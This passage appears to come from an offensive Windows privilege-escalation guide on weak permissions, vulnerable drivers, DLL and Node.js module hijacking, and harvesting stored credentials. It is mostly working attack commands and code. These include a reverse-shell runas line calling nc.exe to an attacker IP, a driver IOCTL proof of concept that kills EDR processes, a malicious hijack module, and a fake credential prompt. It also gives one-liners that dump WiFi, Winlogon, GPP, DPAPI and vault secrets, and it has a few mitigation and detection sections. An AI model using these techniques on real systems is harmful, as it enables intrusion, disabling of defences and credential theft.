Windows lets users specify actions to take when a service fails. This feature can be configured to point at a binary. If that binary can be replaced, privilege escalation may be possible. More details can be found in the official documentation.

Applications

Installed Applications

Check the permissions of the binaries (maybe you can overwrite one and escalate privileges) and of the folders (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Write Permissions

Check whether you can modify a config file to read a special file, or modify a binary that will be executed by an Administrator account (schedtasks).

A way to find weak folder/file permissions on the system is:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Notepad++ plugin autoload persistence/execution

Notepad++ automatically loads any plugin DLL found under its plugins subfolders. If a writable portable/copied install exists, dropping a malicious plugin gives automatic code execution inside notepad++.exe on every launch (including from DllMain and the plugin callbacks).

Notepad Plus Plus Plugin Autoload Persistence

Run at startup

Check whether you can overwrite some registry value or binary that will be executed by a different user.
Read the following page to learn more about interesting autoruns locations for escalating privileges:

Privilege Escalation with Autoruns

Drivers

Look for possible third-party weird/vulnerable drivers

driverquery
driverquery.exe /fo table
driverquery /SI

If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the step-by-step technique here:

Arbitrary Kernel Rw Token Theft

For race-condition bugs where the vulnerable call opens an attacker-controlled Object Manager path, deliberately slowing the lookup (max-length name components or deep directory chains) can widen the window from microseconds to tens of microseconds:

Kernel Race Condition Object Manager Slowdown

Registry hive memory corruption primitives

Modern hive vulnerabilities let you groom deterministic layouts, abuse writable HKLM/HKU descendants, and turn metadata corruption into kernel paged-pool overflows without a custom driver. Learn the full chain here:

Windows Registry Hive Exploitation

Abusing missing FILE_DEVICE_SECURE_OPEN on device objects (LPE + EDR kill)

Some signed third-party drivers create their device object with a strong SDDL via IoCreateDeviceSecure but forget to set FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics. Without this flag, the secure DACL is not enforced when the device is opened through a path that carries an extra component, so any unprivileged user can obtain a handle using a namespace path such as:

  • \\.\DeviceName\anything
  • \\.\amsdk\anyfile (from a real-world case)

Once a user can open the device, the privileged IOCTLs exposed by the driver can be abused for LPE and tampering. Example capabilities observed in the wild:

  • Returning full-access handles to arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
  • Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
  • Killing arbitrary processes, including Protected Process/Light (PP/PPL), enabling AV/EDR kill from user land through the kernel.

Minimal PoC pattern (user mode):

// Example based on a vulnerable antimalware driver
#include <windows.h>

#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

// Open through a path with an extra component after the device name: without
// FILE_DEVICE_SECURE_OPEN the device DACL is not applied to this open
HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mitigations for developers

  • Always set FILE_DEVICE_SECURE_OPEN when creating device objects that are meant to be restricted by a DACL.
  • Validate the caller context for privileged operations. Add PP/PPL checks before allowing process termination or handle returns.
  • Restrict IOCTLs (access masks, METHOD_*, input validation) and consider brokered models instead of direct kernel privileges.

Detection ideas for defenders

  • Monitor user-mode opens of suspicious device names (e.g., \\.\amsdk*) and specific IOCTL sequences that indicate abuse.
  • Enforce Microsoft's vulnerable driver blocklist (HVCI/WDAC/Smart App Control) and maintain your own allow/deny lists.
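As an added example (not code from the original page or from any driver vendor), the following Node.js helper implements the first detection idea: it parses file-open paths into device name plus trailing component and flags watch-listed devices opened with the extra-component shape. The event records, the device name amsdk on the watch list and the telemetry source are assumptions.

```javascript
// Added example (not from the original page): classify file-open paths that
// target a device object with a trailing path component, the shape that
// reaches a driver's IRP_MJ_CREATE without the device DACL being applied when
// FILE_DEVICE_SECURE_OPEN is missing. The input records are constructed here;
// in practice they would come from your file-open telemetry (assumption).

// Prefixes that introduce a device name in Win32 and NT path syntax.
const DEVICE_PREFIXES = ['\\\\.\\', '\\\\?\\', '\\??\\', '\\Device\\'];

// Devices whose namespace legitimately carries trailing components.
const NAMESPACE_DEVICES = new Set(['pipe', 'mailslot', 'globalroot', 'unc']);

// Parse a path into { device, extra, bypassShape }, or null if it is not a
// device-object path (drive-letter and volume-GUID paths are filesystem opens).
function parseDeviceOpen(rawPath) {
  const p = String(rawPath).replace(/\//g, '\\');
  const lower = p.toLowerCase();
  let rest = null;
  for (const prefix of DEVICE_PREFIXES) {
    if (lower.startsWith(prefix.toLowerCase())) {
      rest = p.slice(prefix.length);
      break;
    }
  }
  if (rest === null || /^[a-z]:/i.test(rest) || /^volume\{/i.test(rest)) return null;
  const cut = rest.indexOf('\\');
  const device = cut === -1 ? rest : rest.slice(0, cut);
  const extra = cut === -1 ? '' : rest.slice(cut + 1);
  // A non-empty remainder after the device name is the \\.\Device\anything shape.
  return { device, extra, bypassShape: extra.length > 0 };
}

// Flag opens of watch-listed device names that carry an extra component.
// watchlist holds device names (case-insensitive) you care about, e.g. the
// object name of a third-party driver (assumption); empty means all devices.
function flagSuspiciousOpens(events, watchlist) {
  const watch = new Set([...watchlist].map((d) => d.toLowerCase()));
  const hits = [];
  for (const ev of events) {
    const parsed = parseDeviceOpen(ev.path);
    if (!parsed || !parsed.bypassShape) continue;
    const dev = parsed.device.toLowerCase();
    if (NAMESPACE_DEVICES.has(dev)) continue;        // pipes etc. always carry names
    if (watch.size > 0 && !watch.has(dev)) continue; // not a device we track
    hits.push({ pid: ev.pid, user: ev.user, device: parsed.device, extra: parsed.extra, path: ev.path });
  }
  return hits;
}

// Constructed sample telemetry (not real data).
const SAMPLE_EVENTS = [
  { pid: 4120, user: 'DESKTOP\\lowpriv', path: '\\\\.\\amsdk\\anyfile' },
  { pid: 4120, user: 'DESKTOP\\lowpriv', path: '\\\\.\\amsdk' },
  { pid: 880, user: 'NT AUTHORITY\\SYSTEM', path: '\\\\.\\pipe\\srvsvc' },
  { pid: 5012, user: 'DESKTOP\\lowpriv', path: 'C:\\Windows\\Temp\\x.log' },
  { pid: 5012, user: 'DESKTOP\\lowpriv', path: '\\Device\\amsdk\\..\\x' },
];

for (const h of flagSuspiciousOpens(SAMPLE_EVENTS, ['amsdk'])) {
  console.log(`pid=${h.pid} user=${h.user} device=${h.device} extra=${h.extra}`);
}
```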

PATH DLL Hijacking

If you have write permissions inside a folder present on PATH, you may be able to hijack a DLL loaded by a process and escalate privileges.

Check the permissions of all folders inside PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

For more information about how to abuse this check:

Writable Sys Path +Dll Hijacking Privesc

Node.js / Electron module resolution hijacking via C:\node_modules

This is a Windows uncontrolled search path variant that affects Node.js and Electron applications when they perform a bare import such as require("foo") and the expected module is not present.

Node resolves packages by walking up the directory tree and checking node_modules folders in each parent. On Windows, that walk can reach the drive root, so an application launched from C:\Users\Administrator\project\app.js may end up probing:

  1. C:\Users\Administrator\project\node_modules\foo
  2. C:\Users\Administrator\node_modules\foo
  3. C:\Users\node_modules\foo
  4. C:\node_modules\foo

If a low-privileged user can create C:\node_modules, they can drop a malicious foo.js (or package folder) and wait for a higher-privileged Node/Electron process to resolve the missing dependency. The payload runs in the security context of the victim process, so this becomes an LPE whenever the target runs as administrator, from an elevated scheduled task/service wrapper, or from an auto-started privileged desktop app.

This is especially common when:

  • the dependency is declared in optionalDependencies
  • a third-party library wraps require("foo") in try/catch and continues even when it fails
  • the package was pruned from production builds, left out during packaging, or failed to install
  • the vulnerable require() sits deep in the dependency tree rather than in the main application code

Hunting for vulnerable targets

Use Procmon to confirm the resolution path:

  • Filter by Process Name = target executable (node.exe, the Electron app EXE, or the wrapper process)
  • Filter by Path contains node_modules
  • Watch for NAME NOT FOUND and the last successful open under C:\node_modules

Useful code-review patterns in unpacked .asar files or application sources:

rg -n 'require\\("[^./]' .
rg -n "require\\('[^./]" .
rg -n 'optionalDependencies' .
rg -n 'try[[:space:]]*\\{[[:space:][:print:]]*require\\(' .

Attack execution

  1. Identify the missing package name from Procmon or source review.
  2. Create the root lookup directory if it does not already exist:
mkdir C:\node_modules
  3. Drop a module with the exact expected name:
// C:\node_modules\foo.js
require("child_process").exec("calc.exe")
module.exports = {}
  4. Start the victim application. If the application tries require("foo") and no legitimate module exists, Node can load C:\node_modules\foo.js.

Real examples of missing optional modules matching this pattern include bluebird and utf-8-validate, but the technique is a reusable primitive: look for any missing bare import that a privileged Windows Node/Electron process will resolve.

Detection and hardening ideas

  • Alert when a user creates C:\node_modules or writes new .js files/packages into it.
  • Look for high-integrity processes reading from C:\node_modules\*.
  • Bundle all runtime dependencies into production and audit the use of optionalDependencies.
  • Review third-party code for silent try { require("...") } catch {} patterns.
  • Disable optional probes when the library supports it (for example, some ws deployments can avoid the legacy utf-8-validate probe with WS_NO_UTF_8_VALIDATE=1).

Network

Shares

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Check for other known computers hardcoded in the hosts file

type C:\Windows\System32\drivers\etc\hosts

Network Interfaces & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

Check for restricted services from the outside

netstat -ano #Opened ports?

Routing Table

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall Rules

Check this page for Firewall-related commands (list rules, create rules, turn off, turn off...)

More commands for network enumeration here

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

The bash.exe binary can also be found in C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

If you get the root user you can listen on any port (the first time you use nc.exe to listen on a port it will ask via GUI whether nc should be allowed by the firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

To easily start bash as root, you can try --default-user root

You can explore the WSL filesystem in the folder C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Credentials

Winlogon Credentials

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Credentials manager / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
The Windows Vault stores user credentials for servers, websites and other programs that Windows can log in the users automatically. At first instance, this might look like users can now store their Facebook credentials, Twitter credentials, Gmail credentials etc., so that they automatically log in via browsers. But it is not so.

Windows Vault stores credentials that Windows can log in the users automatically, which means that any Windows application that needs credentials to access a resource (server or website) can make use of this Credential Manager & Windows Vault and use the credentials supplied instead of users entering the username and password all the time.

Unless the applications interact with Credential Manager, I don't think it is possible for them to use the credentials for a given resource. So, if your application wants to make use of the vault, it should somehow communicate with the credential manager and request the credentials for that resource from the default storage vault.

Use cmdkey to list the stored credentials on the machine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Then you can use runas with the /savecred option in order to use the saved credentials. The following example is calling a remote binary via an SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Using runas with a provided set of credentials.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Note that mimikatz, lazagne, credentialfileview, VaultPasswordView, or the Empire PowerShell module can also extract these credentials.

DPAPI

The Data Protection API (DPAPI) provides a method for symmetric encryption of data, used predominantly within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption uses a user or system secret to contribute significantly to entropy.

DPAPI enables the encryption of keys through a symmetric key derived from the user's login secrets. In scenarios involving system encryption, it uses the system's domain authentication secrets.

Encrypted user RSA keys, using DPAPI, are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user's Security Identifier. The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file, typically consists of 64 bytes of random data. (Note that access to this directory is restricted, preventing listing its contents via the dir command in CMD, though it can be listed through PowerShell.)

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

You can use the mimikatz module dpapi::masterkey with the appropriate arguments (/pvk or /rpc) to decrypt it.

The credentials files protected by the master password are usually located in:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt.
You can extract many DPAPI masterkeys from memory with the sekurlsa::dpapi module (if you are root).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently. The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

To decrypt PS credentials from the file containing them you can do:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Saved RDP Connections

You can find them in HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
and in HKCU\Software\Microsoft\Terminal Server Client\Servers\

Recently Run Commands

HKU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Remote Desktop Credential Manager

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Use the Mimikatz dpapi::rdg module with appropriate /masterkey to decrypt any .rdg files
You can extract many DPAPI masterkeys from memory with the Mimikatz sekurlsa::dpapi module

Sticky Notes

People often use the StickyNotes app on Windows workstations to save passwords and other information, not realizing it is a database file. This file is located at C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite and is always worth searching for and examining.

AppCmd.exe

Note that to recover passwords from AppCmd.exe you need to be Administrator and run under a High Integrity level.
AppCmd.exe is located in the %systemroot%\system32\inetsrv\ directory.
If this file exists then it is possible that some credentials have been configured and can be recovered.

This code was extracted from PowerUP:

function Get-ApplicationHost {
    $OrigError = $ErrorActionPreference
    $ErrorActionPreference = "SilentlyContinue"

    # Check if appcmd.exe exists
    if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
        # Create data table to house results
        $DataTable = New-Object System.Data.DataTable

        # Create and name columns in the data table
        $Null = $DataTable.Columns.Add("user")
        $Null = $DataTable.Columns.Add("pass")
        $Null = $DataTable.Columns.Add("type")
        $Null = $DataTable.Columns.Add("vdir")
        $Null = $DataTable.Columns.Add("apppool")

        # Get list of application pools
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

            # Get application pool name
            $PoolName = $_

            # Get username
            $PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
            $PoolUser = Invoke-Expression $PoolUserCmd

            # Get password
            $PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
            $PoolPassword = Invoke-Expression $PoolPasswordCmd

            # Check if credentials exist
            if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
            }
        }

        # Get list of virtual directories
        Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

            # Get Virtual Directory Name
            $VdirName = $_

            # Get username
            $VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
            $VdirUser = Invoke-Expression $VdirUserCmd

            # Get password
            $VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
            $VdirPassword = Invoke-Expression $VdirPasswordCmd

            # Check if credentials exist
            if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
                # Add credentials to database
                $Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
            }
        }

        # Check if any passwords were found
        if ( $DataTable.rows.Count -gt 0 ) {
            # Display results in list view that can feed into the pipeline
            $DataTable | Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
        }
        else {
            # Status user
            Write-Verbose 'No application pool or virtual directory passwords were found.'
            $False
        }
    }
    else {
        Write-Verbose 'Appcmd.exe does not exist in the default location.'
        $False
    }
    $ErrorActionPreference = $OrigError
}

SCClient / SCCM

Check if C:\Windows\CCM\SCClient.exe exists.
Installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading (Info from https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Files and Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Host Keys

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys in registry

SSH private keys can be stored inside the registry key HKCU\Software\OpenSSH\Agent\Keys so you should check if there is anything interesting in there:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

If you find any entry inside that path it will probably be a saved SSH key. It is stored encrypted but can be easily decrypted using https://github.com/ropnop/windows_sshagent_extract.
More information about this technique here: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

If the ssh-agent service is not running and you want it to automatically start on boot run:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

It looks like this technique is no longer valid. I tried to create some ssh keys, add them with ssh-add and login via ssh to a machine. The registry HKCU\Software\OpenSSH\Agent\Keys does not exist and procmon did not identify the use of dpapi.dll during the asymmetric key authentication.

Unattended files

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

You can also search for these files using metasploit: post/windows/gather/enum_unattend

Example content:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
        <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
    </AutoLogon>

    <UserAccounts>
        <LocalAccounts>
            <LocalAccount wcm:action="add">
                <Password>*SENSITIVE*DATA*DELETED*</Password>
                <Group>administrators;users</Group>
                <Name>Administrateur</Name>
            </LocalAccount>
        </LocalAccounts>
    </UserAccounts>

SAM & SYSTEM backups

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Cloud Credentials

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Search for a file called SiteList.xml

Cached GPP Password

A feature was previously available that allowed the deployment of custom local administrator accounts on a group of machines via Group Policy Preferences (GPP). However, this method had significant security flaws. Firstly, the Group Policy Objects (GPOs), stored as XML files in SYSVOL, could be accessed by any domain user. Secondly, the passwords within these GPPs, encrypted with AES256 using a publicly documented default key, could be decrypted by any authenticated user. This posed a serious risk, as it could allow users to gain elevated privileges.

To mitigate this risk, a function was developed to scan for locally cached GPP files containing a "cpassword" field that is not empty. Upon finding such a file, the function decrypts the password and returns a custom PowerShell object. This object includes details about the GPP and the file's location, aiding in the identification and remediation of this security vulnerability.

Search in C:\ProgramData\Microsoft\Group Policy\history or in C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) for these files:

  • Groups.xml
  • Services.xml
  • Scheduledtasks.xml
  • DataSources.xml
  • Printers.xml
  • Drives.xml

To decrypt the cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Using crackmapexec to get the passwords:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Web Config

Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
C:\inetpub\wwwroot\web.config
Get-Childitem -Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Example of web.config with credentials:

<authentication mode="Forms">
    <forms name="login" loginUrl="/admin">
        <credentials passwordFormat = "Clear">
            <user name="Administrator" password="SuperAdminPassword" />
        </credentials>
    </forms>
</authentication>

OpenVPN credentials

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
    $encryptedbytes=$item.'auth-data'
    $entropy=$item.'entropy'
    $entropy=$entropy[0..(($entropy.Length)-2)]

    $decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
        $encryptedBytes,
        $entropy,
        [System.Security.Cryptography.DataProtectionScope]::CurrentUser)

    Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Logs

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem -Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Ask for credentials

You can always ask the user to enter his credentials or even the credentials of a different user if you think he can know them (notice that asking the client directly for the credentials is really risky):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Possible filenames containing credentials

Known files that some time ago contained passwords in clear-text or Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

Search all of the proposed files:

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"
Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials in the RecycleBin

You should also check the Bin to look for credentials inside it

To recover passwords saved by several programs you can use: http://www.nirsoft.net/password_recovery_tools.html

Inside the registry

Other possible registry keys with credentials

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Keys"

Extract openssh keys from registry.

Browsers History

You should check for dbs where passwords from Chrome or Firefox are stored.
Also check the history, bookmarks and favourites of the browsers so maybe some passwords are stored there.

Tools to extract passwords from browsers:

COM DLL Overwriting

The Component Object Model (COM) is a technology built within the Windows operating system that allows intercommunication between software components of different languages. Each COM component is identified via a class ID (CLSID) and each component exposes functionality via one or more interfaces, identified via interface IDs (IIDs).

